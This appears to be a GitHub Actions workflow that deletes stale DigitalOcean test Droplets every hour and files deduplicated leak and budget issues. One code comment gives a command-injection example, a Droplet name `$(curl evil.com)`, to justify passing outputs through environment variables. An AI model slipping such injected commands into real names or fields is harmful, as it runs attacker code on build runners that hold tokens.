Skip to content

Conformance Leak Scrubber #21

Conformance Leak Scrubber

Conformance Leak Scrubber #21

name: Conformance Leak Scrubber
# Hourly safety net for conformance Droplets that escaped both the
# in-test t.Cleanup and the smoke-job's outer always() cleanup. Lists
# DO resources tagged conformance-pr-* older than 1 hour, deletes
# each, aggregates counts. If anything was scrubbed, files (or
# appends to) a dedup'd GitHub issue via
# scripts/file-or-comment-leak-issue.sh.
#
# Same job ALSO runs the budget-incident dedup: if month-to-date
# spend exceeds the $25/mo cap (recovery window after a soft-alert
# preceding hour), or if scrub events have fired more than 3 times
# today, files a separate dedup'd issue under the
# conformance-budget-incident label.
#
# Cadence: hourly cron + on-demand workflow_dispatch for operator
# manual triggers (e.g., after a budget calibration to clear stale
# state). The cron uses the standard `0 * * * *` pattern so the
# wall-clock TTL on conformance-pr-* tags lines up with the leak
# detection threshold.
on:
schedule:
# Top of every hour, UTC. Fires regardless of branch state.
- cron: '0 * * * *'
workflow_dispatch:
permissions:
contents: read
issues: write # required by the dedup helper to file/comment
# Single concurrent scrubber: stacked cron + manual dispatches must
# not double-delete or double-file.
concurrency:
group: conformance-leak-scrubber
cancel-in-progress: false
jobs:
scrub:
name: Hourly DO leak scrub
runs-on: ubuntu-latest
env:
DO_CONFORMANCE_API_TOKEN: ${{ secrets.DO_CONFORMANCE_API_TOKEN }}
AGE_THRESHOLD_SECONDS: 3600 # 1 hour — matches the smoke job's expected lifetime
BUDGET_HARD_CAP_USD: 25 # mirrors conformance-budget-check.yml
DAILY_SCRUB_THRESHOLD: 3 # > 3 scrub events / day → file budget incident too
steps:
- name: Check out workflow repo
uses: actions/checkout@v4
# Detect unconfigured secret. The cron fires on a fixed
# schedule regardless of secret provisioning state; if the
# operator hasn't yet provisioned DO_CONFORMANCE_API_TOKEN
# there are also no resources to scrub (the smoke gate
# cannot have created any). Skip the entire job in that case
# rather than cascading curl-401 failures into hourly noise.
- name: Detect unconfigured token
id: gate
run: |
set -euo pipefail
if [[ -z "${DO_CONFORMANCE_API_TOKEN}" ]]; then
echo "::notice title=Scrubber unarmed::DO_CONFORMANCE_API_TOKEN secret not configured; skipping hourly scrub. No conformance resources can exist without the token."
echo "armed=false" >> "$GITHUB_OUTPUT"
else
echo "armed=true" >> "$GITHUB_OUTPUT"
fi
- name: List + delete leaked Droplets
if: steps.gate.outputs.armed == 'true'
id: scrub
run: |
set -euo pipefail
NOW_EPOCH=$(date -u +%s)
# GET /v2/droplets?tag_name=... pages at 200/page; the
# conformance account holds zero baseline resources so we
# do not expect to paginate, but we follow the next-page
# link defensively.
PAGE_URL="https://api.digitalocean.com/v2/droplets?per_page=200"
SCRUBBED=0
DETAILS=""
while [[ -n "${PAGE_URL}" ]]; do
RESPONSE=$(curl --silent --show-error --fail \
-H "Authorization: Bearer ${DO_CONFORMANCE_API_TOKEN}" \
"${PAGE_URL}")
# Iterate Droplets whose tags include any conformance-pr-*
# entry AND whose created_at is older than the threshold.
while IFS=$'\t' read -r ID NAME CREATED_AT; do
[[ -z "${ID}" ]] && continue
CREATED_EPOCH=$(date -u -j -f '%Y-%m-%dT%H:%M:%SZ' "${CREATED_AT}" +%s 2>/dev/null \
|| date -u -d "${CREATED_AT}" +%s)
AGE=$(( NOW_EPOCH - CREATED_EPOCH ))
if [[ "${AGE}" -gt "${AGE_THRESHOLD_SECONDS}" ]]; then
# Force-delete via DELETE /v2/droplets/{id}.
curl --silent --show-error --fail \
-X DELETE \
-H "Authorization: Bearer ${DO_CONFORMANCE_API_TOKEN}" \
"https://api.digitalocean.com/v2/droplets/${ID}"
SCRUBBED=$(( SCRUBBED + 1 ))
DETAILS+="- droplet ${ID} (${NAME}, age=${AGE}s)\\n"
echo "deleted droplet ${ID} (${NAME}, age=${AGE}s)"
fi
done < <(echo "${RESPONSE}" \
| jq -r '.droplets[]? | select(.tags // [] | any(startswith("conformance-pr-"))) | [.id, .name, .created_at] | @tsv')
PAGE_URL=$(echo "${RESPONSE}" | jq -r '.links.pages.next // ""')
done
echo "count=${SCRUBBED}" >> "$GITHUB_OUTPUT"
# Use a delimiter for multi-line outputs so newlines survive.
{
echo "details<<EOF"
printf '%b' "${DETAILS}"
echo "EOF"
} >> "$GITHUB_OUTPUT"
echo "scrubbed_count=${SCRUBBED}" >> "$GITHUB_STEP_SUMMARY"
# Pass the scrub outputs through `env:` rather than templating
# them into the script body. ${{ ... }} substitution happens
# BEFORE bash sees the script, so a Droplet name with shell
# metacharacters from the DO API (e.g., `$(curl evil.com)`)
# would otherwise execute on the runner with GITHUB_TOKEN
# access. Reading via env-var-at-runtime is the GitHub-Actions-
# documented mitigation:
# https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable
- name: File / comment on dedup leak issue
if: steps.gate.outputs.armed == 'true' && steps.scrub.outputs.count != '0'
env:
GH_TOKEN: ${{ github.token }}
PRIMARY_LABEL: conformance-leak-incident
HELPER_LABEL: auto-filed-leak
SCRUB_COUNT: ${{ steps.scrub.outputs.count }}
SCRUB_DETAILS: ${{ steps.scrub.outputs.details }}
run: |
.github/workflows/scripts/file-or-comment-leak-issue.sh \
"${SCRUB_COUNT}" \
"${SCRUB_DETAILS}"
# Budget-incident gate. Two independent triggers:
# 1. Month-to-date spend > $25/mo cap (the smoke-gate kill-
# switch already aborts new runs above this; this branch
# ensures an audit-trail issue exists).
# 2. Scrub EVENTS today > 3 — sustained leak rate that
# warrants human investigation regardless of dollar value.
# Files into a SEPARATE dedup chain so leak vs. budget swimlanes
# stay clean.
#
# IMPORTANT: counting "scrub events" means counting actual
# scrub runs that detected leaks, NOT counting issues created
# today. Because the dedup helper appends comments to a single
# open issue rather than filing fresh ones, an issues-created-
# today count caps at 1 even during a steady-state leak —
# silently failing the > 3/day escalation. The fix counts the
# COMMENTS on the open dedup issue (each scrub appends one),
# plus 1 if the issue itself was filed today (first-detection-
# of-day case). Identified by spec-review of T7.14, fixed in
# this commit.
- name: Check balance + escalate budget incident
if: steps.gate.outputs.armed == 'true'
env:
GH_TOKEN: ${{ github.token }}
run: |
set -euo pipefail
BALANCE=$(curl --silent --show-error --fail \
-H "Authorization: Bearer ${DO_CONFORMANCE_API_TOKEN}" \
"https://api.digitalocean.com/v2/customers/my/balance")
SPEND=$(jq -r '.month_to_date_usage // "0"' <<< "${BALANCE}")
# Count today's scrub events from the open dedup issue's
# comment trail. Each scrub run that detected leaks appends
# one comment via the dedup helper. If no open dedup issue
# exists yet (no leaks today), the count is 0.
TODAY="$(date -u '+%Y-%m-%d')"
EXISTING=$(gh issue list \
--label conformance-leak-incident \
--label auto-filed-leak \
--state open \
--json number \
--jq '.[0].number // empty')
if [[ -n "${EXISTING}" ]]; then
# Paginate over comments; count those created today.
#
# IMPORTANT: --paginate runs the --jq filter PER PAGE, so a
# `... | length` inside --jq emits one length per page and
# would yield a multi-line string once the issue paginates
# (every 30 comments by default). Bash arithmetic on a
# multi-line string fails with "syntax error in expression"
# exactly when the scrubber is most needed (sustained-leak
# incident has accumulated comments). Mitigation: extract
# one created_at line per matching comment, then count the
# resulting lines via wc -l. This survives any number of
# pages because wc operates on the merged stream.
COMMENTS_TODAY=$(gh api \
"repos/${GITHUB_REPOSITORY}/issues/${EXISTING}/comments" \
--paginate \
--jq ".[] | select(.created_at >= \"${TODAY}T00:00:00Z\") | .created_at" \
| wc -l \
| tr -d ' ')
# Include the issue creation itself if it was today
# (covers the first-detection-of-day case where there
# are 0 comments yet but 1 scrub event has fired).
ISSUE_TODAY=$(gh issue view "${EXISTING}" \
--json createdAt \
--jq "if .createdAt >= \"${TODAY}T00:00:00Z\" then 1 else 0 end")
TODAY_SCRUBS=$(( COMMENTS_TODAY + ISSUE_TODAY ))
else
TODAY_SCRUBS=0
fi
ESCALATE=0
REASON=""
if awk "BEGIN { exit !(${SPEND} > ${BUDGET_HARD_CAP_USD}) }"; then
ESCALATE=1
REASON="month-to-date \$${SPEND} > \$${BUDGET_HARD_CAP_USD} cap"
fi
if [[ "${TODAY_SCRUBS}" -gt "${DAILY_SCRUB_THRESHOLD}" ]]; then
ESCALATE=1
REASON="${REASON:+${REASON}; }${TODAY_SCRUBS} scrub events today > ${DAILY_SCRUB_THRESHOLD} threshold"
fi
if [[ "${ESCALATE}" -eq 1 ]]; then
PRIMARY_LABEL=conformance-budget-incident \
HELPER_LABEL=auto-filed-budget \
ISSUE_TITLE="Conformance budget incident: ${REASON}" \
.github/workflows/scripts/file-or-comment-leak-issue.sh \
"${SPEND}" "${REASON}"
else
echo "::notice title=Budget OK::month_to_date_usage=${SPEND}; today_scrubs=${TODAY_SCRUBS}"
fi